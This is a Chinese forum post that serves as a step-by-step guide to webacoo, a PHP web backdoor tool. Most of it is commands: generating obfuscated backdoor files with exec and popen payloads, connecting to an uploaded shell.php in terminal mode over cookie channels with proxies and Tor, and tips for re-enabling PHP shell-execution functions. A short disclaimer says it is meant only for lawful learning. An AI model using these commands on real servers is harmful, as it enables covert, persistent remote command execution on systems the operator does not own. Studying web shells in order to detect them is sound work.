请选择 进入手机版 | 继续访问电脑版
查看: 351|回复: 0

一款隐蔽的php脚本类web后门工具webacoo

[复制链接]

签到天数: 25 天

[LV.4]偶尔看看III

134

主题

140

帖子

3115

积分

管理员

Rank: 9Rank: 9Rank: 9

积分
3115

活跃会员宣传达人灌水之王热心会员推广达人突出贡献优秀版主荣誉管理论坛元老

发表于 2020-5-29 17:27:20 | 显示全部楼层 |阅读模式
使用默认配置生成模糊的后门代码
  1. webacoo -g -o shell.php
复制代码
1.png
使用exec有效载荷混淆后门代码
  1. webacoo -g -o shell_1.php -f 3
复制代码
2.png
使用popen有效载荷生成原始后门
  1. webacoo -g -o shell_2.php -f 5 -r
复制代码
3.png
使用终端模式连接后门
1,默认参数 -u 访问服务器
  1. webacoo -t -u http://192.168.106.131/template/upload/shell.php
复制代码
4.png
2,将Test-cookie 作为cookie名称,TtT作为分隔符,访问服务器
  1. webacoo -t -u http://192.168.106.131/template/upload/shell.php -c "Test-cookie" -d "TtT"
复制代码
3,将Test-cookie2 作为cookie 名称,TtT作为分隔符,使用代理服务器10.0.1.5:8081访问服务器
  1. webacoo -t -u http://192.168.106.131/template/upload/shell.php -c "Test-cookie2" -d "TtT" -p 10.0.1.5:8081
复制代码
4,将My-cookie 作为cookie名称,使用tor代理网络访问后门
  1. webacoo -t -uhttp://192.168.106.131/template/upload/shell.php -c "My-cookie" -p tor
复制代码
使用技巧
1,在Windows环境下需要php程序支持相应的函数,可以在php.ini文件中设置disable_functions,取消禁用函数exec,system,passthru,shell_exec,示例如下
disable_functions=escapeshellarg,escapeshellcmd,proc_close,proc_open,dll,popen,show_source
通过https代理支持,配合Burp Site等工具实现。
webacoo -t -u http://192.168.106.131/template/upload/shell.php -p 127.0.0.1:8080
webacoo -t -u https://192.168.106.131/template/upload/shell.php -p 127.0.0.1:8080
2,在非ubantu环境下,需要liburi-perl,libio-socket-socks-perl组件的支持

在局域网环境进行,切勿用于非法用途
声明:
切勿使用在本网站学习的方法攻击其他计算机,保护网络安全,人人有责,做一个维护网络安全的人。
该网站编写此类文章的目标是为了让渗透测试爱好者在学习过程中更好的掌握技巧和方法同时也让广大网民了解黑客是如何对互联网进行攻击的从而更好的保护网络财产安全,如果使用在本站学习的方法和技巧攻击其他计算机的造成的后果自负,与本站无关,学技术不是为了搞破坏,而是为了更好的去保护我们祖国的网络安全!

回复

使用道具 举报

您需要登录后才可以回帖 登录 | 立即注册

本版积分规则

QQ|Archiver|手机版|小黑屋| TTFY论坛-IT信息技术计算机行业交流发表平台 ( 黔ICP备19006062号 )

GMT+8, 2020-9-22 09:25 , Processed in 0.028718 second(s), 30 queries .

Powered by Discuz! X3.4

© 2001-2013 Comsenz Inc.

快速回复 返回顶部 返回列表